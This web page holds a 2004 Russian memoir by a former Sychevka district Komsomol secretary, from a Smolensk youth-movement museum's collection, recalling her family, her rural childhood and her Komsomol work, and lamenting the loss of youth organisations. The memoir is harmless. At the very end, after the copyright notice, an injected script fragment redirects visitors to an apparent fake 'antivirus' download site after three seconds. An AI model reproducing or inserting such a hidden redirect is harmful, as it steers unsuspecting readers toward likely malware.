Так это было
 
 

 

Сборник "Так это было. Смоленский комсомол 1960-80 годов в воспоминаниях современников"


Литература
Так это было

"Так это было.
Смоленский
комсомол 1960-80
годов в воспоминаниях
современников"
Дети и молодёжь Смоленщины 1920-1930-е годы
Дети и молодёжь
Смоленщины
1920-1930-е годы

Спонсоры музея истории молодежного движения

 

Выражаем огромную благодарность людям, которые приняли и принимают участие в жизни музея и комплектации его фондов.


       
      
 

 

Надежда Вячеславовна Патокина,
секретарь Сычевского райкома ВЛКСМ
с 1978 по 1985 год.

Н.В. Патокина

 
 

КОМСОМОЛ В МОЕЙ СУДЬБЕ

Комсомольский билет №36157008, комсомольские значки, свидетельство Новгородской зональной комсомольской школы, значок ЦК ВЛКСМ «За активную работу в комсомоле», грамоты, множество черно-белых, но дорогих для меня фотографий, на которых запечатлены фрагменты знаменательных событий моей молодости, – все это бережно храню, с добрым чувством вспоминаю. Это были бурные, запоминающиеся, добрые, судьбоносные для меня годы.
А еще осталась память о времени, которое никогда не забудется, о времени, которое называлось комсомолом.
Для меня, обычной ученицы советской школы, все складывалось, как и у большинства детей – октябренок, пионерка, комсомолка.
Большую роль, главную, в моей жизни сыграли мои родные. Бабушка, Анна Ивановна Титова, в 29 лет осталась вдовой. Муж ее, мой дед Титов Алексей Петрович, погиб в боях под Смоленском в 1943 году. Бабушка до конца дней своих хранила память о нем. Я помню строки его последнего письма: «Дорогая Нюра! Стоим под Смоленском с немцем лоб в лоб. Завтра снова бой. В дальнейшем не надеюсь быть живым. Береги себя и Тоню. Алексей».
А потом пришла «похоронка». Надеяться было не на кого. Бабушка, а мы с братом звали ее мама Нюра, работала в колхозе: на лесозаготовках, в животноводстве. Перед оккупацией Новодугинского района перегоняла скот сычевской породы в Рязанскую область.
Всю жизнь на тяжелых работах, никогда не отдыхала, никому не жаловалась на свою судьбу, всегда поступала по справедливости, в порядке держала дом и хозяйство. Так и нас с братом приучила во всем к порядку. Любила нас больше жизни, с нетерпением ждала нас на каникулы. Лучше бабушкиных блинов, щей из русской печки для меня ничего не было.
В доме в углу висела икона, а рядом на стене портрет В.И.Ленина. Отец мой был настоящий коммунист, во время войны в 14 лет работал на заводе. Сам он вырос в многодетной семье шуйских ткачей, закончил Ивановский сельскохозяйственный институт, по распределению приехал на Смоленщину и 35 лет работал агрономом. Что меня удивляло в нем – он всегда был в работе и много читал. Читал и новинки по агрономии, и научные статьи, выписывал очень много специальных журналов. Он всегда был в курсе всех событий в стране, имел свое независимое суждение. А результатом его профессионализма были высокие урожаи зерна и овощей, где бы он ни работал.
Мама у меня беспартийная, но всегда чувствует ритм жизни, всегда была, да и сейчас в курсе всех моих событий. Всегда вместе со мной переживала все периоды моих взлетов и падений.
Родители воспитывали нас с братом в доброте и честности, в справедливости и любви к труду. Заботясь о нашем здоровье, заставляли заниматься спортом: лыжи, коньки, шахматы, вождение мотоцикла, автомашины. Помню, отец, возвращаясь из командировок, привозил то гантели, то эспандер, то коньки и пр. Активная жизненная позиция родителей сказалась и на нас с братом.
В классе, в институте среди сверстников я была младше всех, но всегда была в центре всех событий, мероприятий. Учась в школе, я решила твердо быть только учителем математики. И моя мечта сбылась. Я закончила физмат СГПИ.
В 20 с половиной лет я получила высшее педагогическое образование и пришла работать в Ананиховскую сельскую школу, где кроме уроков вела пионерскую работу. Мне очень нравилось быть учителем, я думала, что никогда не уйду из школы. У нас был замечательный коллектив, который возглавляла А.А.Куликова. Человек очень увлеченный, беспокойный.
А через год мне предложили должность секретаря райкома комсомола. Я тогда не представляла, что меня ждет, не знала даже, что должность секретаря выше, чем инструктор. Но, как всегда, со всей серьезностью и ответственностью стала постигать азы комсомоль­ской работы. Ни о какой карьере и мысли не было, я просто работала, было сложно, но интересно. В моем характере – уметь преодолевать сложности, встречающиеся на пути. Директор школы не хотела меня отпускать, даже пригрозила, что не даст рекомендацию в члены КПСС, но потом сменила гнев и первая дала мне рекомендацию.
Никаких «покровителей» у меня никогда не было. Всего, что я достигла, я добилась сама. А в принципе, никогда не добивалась, все как-то шло своим чередом. Я никогда не бралась за то дело, в чем сомневалась, если знала, что не справлюсь.
Я из простой крестьянской семьи, все мое детство прошло в деревне Лашутиха Новодугинского района, о которой остались самые теплые и радостные воспоминания. Там жили мои родные и друзья. Бабушка научила меня всему крестьянскому труду. Я и сейчас могу топить русскую печь, косить, распахать огород, колоть дрова, доить корову. Там, в деревне, мы с друзьями всегда находили интересные дела: играли в лапту, в футбол, ходили за ягодами, пасли овец, помогали селянам убирать урожай. Помню, как вязали лен, на конных граблях сгребали сено с полей. И это было в порядке вещей, наперегонки, кто больше сделает.
Обучаясь в школе, мы стремились учиться лучше, добивались хороших результатов. Мы сами убирали свой класс. Всегда с желанием трудились на полях: вязали лен, убирали картофель, брюкву, свеклу.
Интересные походы, экскурсии по местам славы, мероприятия, смотры, конкурсы... всегда в делах. И времени не было, чтобы скучать, заниматься бездельем или проводить время так, как сейчас видим проводят его подростки: с сигаретой в руке, с бутылкой пива или целыми днями в телеиграх. Было ЧП, если кто-то не посещал школу без причины.
Жизненная закалка была с детства. Мы не требовали от родителей многого. Все необходимое имели. В классе не выделялись бедные и богатые, отличие было только в том, кто лучше учится, а кто хуже.
Жили всегда дружно. А если ссорились, то быстро мирились.
Все это позволило мне смело вступить во взрослую жизнь. Общие полезные дела, общие интересы, поддержка друзей – это явилось основой для активной работы в комсомоле.
Все в памяти – пионерские слеты, «Зарницы», трудовые операции «Лен», «Малютка».
В своих блокнотах нашла некоторые цифры: в 1979 году в начале сентября силами учащихся было увязано и сдано государству 2000 т льнопродукции.
Инициативой сычевских школьников был сбор металлолома и макулатуры для приобретения тракторов, которыми обком ВЛКСМ награждал лучших молодых механизаторов. 4 таких трактора с ласковым названием «Малютка» были вручены сычевским передовикам, и первый такой трактор получил лауреат премии Ленинского комсомола Виктор Крючков, один из лучших льноводов района.
Старшеклассники были участниками районных соревнований молодых операторов машинного доения – так готовилась достойная смена знаменитым сычевским дояркам. Многие из участников конкурсов впоследствии стали передовиками. Сычевская комсомольская организация гордилась дояром племзавода «Сычевка» Иваном Кругловым, операторами машинного доения Г.Соколовой, Н.Смородиной, телятницей Л.Жуковой и др. Одна из нынешних лидеров животноводства в районе доярка Надежда Козырева была участницей Международного молодежного фестиваля в Москве в 1985 году.
Мы организовывали и проводили трудовые десанты. Помню, как меня с отрядом юношей и девушек отправил райком партии на заготовку сена в д.Бехтеево, на уборку льна в д.Соколино. И мы существенно помогли хозяйствам. Мы не гнушались никакой работы.
В районе проводились конкурсы профессионального мастерства «Лучший по профессии», организовывались комсомольско-молодежные бригады. Сейчас уже не существует многих организаций, а в памяти ребята-передовики бывшего ДПМК – комсомольско-моло­дежные коллективы Н.Кузмаринского, В.Козлова, – комсомольско-молодежные экипажи автоколонны В.Павлова, А.Вишневского, комсомольско-молодежная бригада Н.Кирсова по мелиорации, комсомольско-молодежная бригада И.Халаимова на электродном заводе и другие. Знаю, что и сейчас, воспитывая уже своих детей и внуков, они гордятся своими наградами. Они и сейчас не потерялись, нашли свое место, работают, обеспечивают свои семьи. Я помню многих комсомольских активистов. Они с чувством гордости вспоминают свою принадлежность к комсомолу и с той же ответственностью выполняют добросовестно свою производственную и общественную работу. Среди них Т.Фокина, М.Смирнов, А.Круглов, Г.Мысова, В.Грудкин, И.Доброва, Л.Соловьева, Г.Реброва, А.Кудрявцев, В.Кудрявцева, А.Агафонов, Т.Белова и многие другие.
А как было интересно летом, когда почти во всех хозяйствах, во всех строительных организациях работали бойцы ССО! Множество объектов было построено студентами МАИ, энергоинститута. Они не только строили, но и интересно и полезно проводили досуг: организовывали соревнования и праздники с сельской молодежью, гуляли свадьбы.
Я вспоминаю комсомольские свадьбы Галины и Сергея Орловых в клубе деревни Б.Моховатка, Натальи и Александра Семученковых в д.Ломосово. Сейчас это крепкие семьи, у них уже взрослые дети, даже есть внуки.
Сейчас существует проблема набора призывников в армию, а в те годы ребята обязательно шли в армию, поступали в военные училища. С гордостью носили военную форму. Девчонки верно ждали ребят из армии. Не было такого, чтобы призывники скрывались от службы. Единственной причиной не служить в армии было какое-либо серьезное заболевание, но и таких было мало.
Ребятам устраивали торжественные проводы, все родные гордились, что сын их верно служит Родине. И сычевские ребята не позорили честь солдата. И не пустыми были слова о патриотизме, о храбро­сти солдат Великой Отечественной войны, партизан и подпольщиков. Большое значение в 80-е годы имела книга Н.К.Павлова «Исполнение долга» о сычевских комсомольцах-подпольщиках под руководством Дмитрия Огурцова. В результате большой патриотической, краеведческой работы на месте расстрела комсомольцев-подпольщиков был установлен памятник. Молодежь знает в Сычевском районе «долину смерти» – так называют места возле деревни Аристово, где шли ожесточенные бои с фашистами в 1942 году. Там каждая пядь земли полита кровью. Там приняла земля погибших советских солдат.
Сейчас ежегодно проводятся в районе «Вахты памяти». О них существует много мнений, положительных и отрицательных. Ежегодно поисковики разрывают прежние окопы, землянки, воронки, где находят останки воинов. Зрелище впечатляющее даже для взрослых. Поднимают тысячи останков, находят 2-3 медальона, но вместе с тем находят и оружие, боеприпасы, которые потом оказываются в тайниках, на квартирах, выявляются при совершении преступлений. Стоит ли находить это оружие, чтобы оно впоследствии выстрелило во внуков или правнуков тех, кто воевал?..
В школах района шла своя интересная жизнь. Пионеры и комсомольцы воспитывались в духе патриотизма, любви к Родине, шефствовали над ветеранами ВОВ, организовывали встречи с ними, ходили в походы, проводили слеты. В памяти зрелищные показательные вы­ступления юных спортсменов на площади Революции в праздник Победы 9 мая, в День Великой Октябрьской революции 7 ноября, в День защиты детей 1 июня.
А какие проходили баталии на хоккейной площадке в центре города! Мальчишки с азартом участвовали в соревнованиях «Золотая шайба». Каток не пустовал, пока не таял лед.
В 1984 году в районе должны были пройти областные сельские спортивные игры. И чтобы приготовиться к их проведению, в кратчайшие сроки был построен стадион. Работали все организации, молодежь на субботниках и воскресниках выполняла большие объемы работ по благоустройству стадиона.
В дни проведения спартакиады были захватывающие зрелища: выступления парашютистов, конников, футбол и т.д.
Много еще можно перечислять интересных и полезных дел молодежи. Но главное, что все эти добрые дела оставляли положительный след в душах юношей и девушек. Это не пустые слова. Школьники стремились хорошо учиться, получить высшее образование, добросовестно трудиться.
Любое дело оставляет свой след в умах людей – плохой или хороший. Так вот, дела и свершения комсомольцев 70–80-х годов, думаю, оставили добрый след.
Да, к сожалению, молодость быстро проходит. Она кажется длинной, когда в ней живешь, но очень короткой, когда о ней вспоминаешь.
Я с трепетным чувством, с большим желанием встречаюсь со своими одноклассниками и особенно с комсомольскими друзьями, коллегами. Это необъяснимо, но настолько по-родственному близко и полезно!.. Эти встречи освещены какой-то положительной энергией. После таких встреч, кажется, жизнь только начинается.
Самые яркие и запоминающиеся события связаны именно с комсомолом. Добрые взаимоотношения были и остаются с товарищами, которые работали в райкоме комсомола. Это М.Полуян, А.Денисов, Т.Иванцова, Е.Федорова и многие другие. И сейчас, встречаясь с ними, решая какие-то жизненные вопросы, намного легче общаешься, быстрее находишь понимание.
Оглядываясь назад, понимаешь, что в то время обком комсомола вел очень грамотную кадровую политику. Мы не зацикливались только на своей районной жизни. Проводились межрайонные соревнования, совещания, эстафеты. Практиковалась ротация кадров. В областном комитете всегда можно было найти понимание, поддержку, но и спрос всегда был по полной программе. В памяти бывшие секретари обкома комсомола Л.И.Аксенова, В.И.Атрощенков, В.Н.Тимошенков, Н.Н.Мишин, А.М.Капустин, Т.И.Ашихмина.
Всегда с благодарностью вспоминаю своих первых наставников В.И.Котову, В.Н.Пронькину и многих других. Помню всех.
Очень благодарна своей судьбе, что в моей жизни был комсомол. Он многому научил. И главное, научил работать, ориентироваться в жизненных ситуациях, общаться с людьми, решать их проблемы, содержать все дела в порядке.
В 1985 году я вышла из комсомола, так как была направлена на учебу в Московскую высшую партийную школу. После окончания ВПШ работала секретарем райисполкома, возглавляла орган социальной защиты, образования. Всегда была среди людей, всегда старалась разрешить их проблемы. Никогда не лукавила и не обещала того, что не могла выполнить.
Считаю, что только комсомол, мои старшие наставники сформировали меня такой, какая я сейчас. Ну и, конечно, мой характер – решительный, неутомимый, непокорный, жизнерадостный, твердый и настойчивый, прямолинейный.
Мне больно осознавать, что сейчас нет того комсомола, что досуг детей наших не заполнен добрыми, полезными делами. Им взрослые дали свободу, открыли двери в тот мир, от которого раньше комсомольцев оберегали. И этой свободой многие не смогли воспользоваться для своей пользы. Дети познали наркотики, алкоголь, бездуховно проводят свободное время. Молодежь не может трудоустроиться, хотя стремится приобрести профессии. 
Перевернулось все: то, что было запрещено в годы нашей молодости, теперь взяло верх. Добро, порядочность, патриотизм, духовность, нравственность, любовь к Родине и к родному очагу уступили место тунеядству, бездуховности, распущенности, алчности, пренебрежению к Отечеству.
Почему так произошло?
Причин тому много. Может быть, оттого, что комсомол не был самостоятелен в своей деятельности, а работал под «чутким» руководством партии. И как только распалась КПСС, автоматически прекратил свое существование Коммунистический союз молодежи в том масштабе, в каком он работал. По сути, это была политическая организация.
Считаю, что действительно комсомол был чересчур политизирован. Перечеркнута в памяти была вся история России до 1917 года. К примеру, разве можно было одним махом религиозную Россию превратить в неверующую страну? А ведь преследовали тех комсомольцев, кто крестил своих детей. Жизнь показала, что вечно, а что тленно.
Сейчас я возглавляю отдел по образованию Сычевского района. И вижу, что, кроме школы, ПТУ, никто не организовывает молодежь. Единственная организация – школа – ведет борьбу за знания учащихся. Кроме битвы за знания, нужно отбиваться от социальных бед. Одолевают наркомания, алкоголизм, завлекает молодежь проституция.
Мы изгнали из молодежной среды то единственное, что могло этим «головам дракона» противостоять, – комсомол, пионерские и октябрятские организации. В итоге мы не только лишились помощников в битве за знания, но и в прямом смысле отправили молодежь в объятья преступных организаций.
И если мы по-прежнему будем бояться политической деятельности школьников, то они сами займутся такой деятельностью, где на первое место выйдут задачи криминальной среды.
Думаю, надо начать восстановление всей системы молодежных организаций в централизованном порядке. Это должна быть государственная политика.
Если на затуманивание, задурманивание и развращение детских умов идут огромные деньги, то государству придется потратить не меньше средств, вложив их в исправительные учреждения, милицию, в лечебные центры для нейтрализации результатов этой пагубной деятельности, вызванной детской беспризорностью.
Воспитание в детских и юношеских организациях сэкономит государству больше, чем ему придется потратить на перевоспитание. А ведь опыт воспитания в России богатейший.
Думаю, следует вернуть детским коллективам общегосударственную цель. Такая цель сгладит противоречия в обществе, мобилизует людей и их детей на ее достижение. Такой целью должно стать стремление к истинно русским, православным ценностям: любовь к ближнему, любовь к родителям, любовь к Родине, а не стремление к богатству любой ценой.
В этой связи я вспоминаю строчки стихотворения, несколько лет назад напечатанного в газете «Смена»: «...еще никто не сшил из денег крылья, которые бы в смертный час спасли...»
А закончить свои рассуждения хочу такими словами из стихо­творения Василия Федорова:

 Все испытав, мы знаем сами,
 Что в дни психических атак
 Сердца, не занятые нами,
 Не мешкая, займет наш враг.

2004 г.

 

    (c) Авторские права на сайт принадлежат ООО "Союз ДМ", Смоленской областной общественной организации Общероссийской общественной организации "Российский Союз Молодежи", 2008-2012г.  
setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>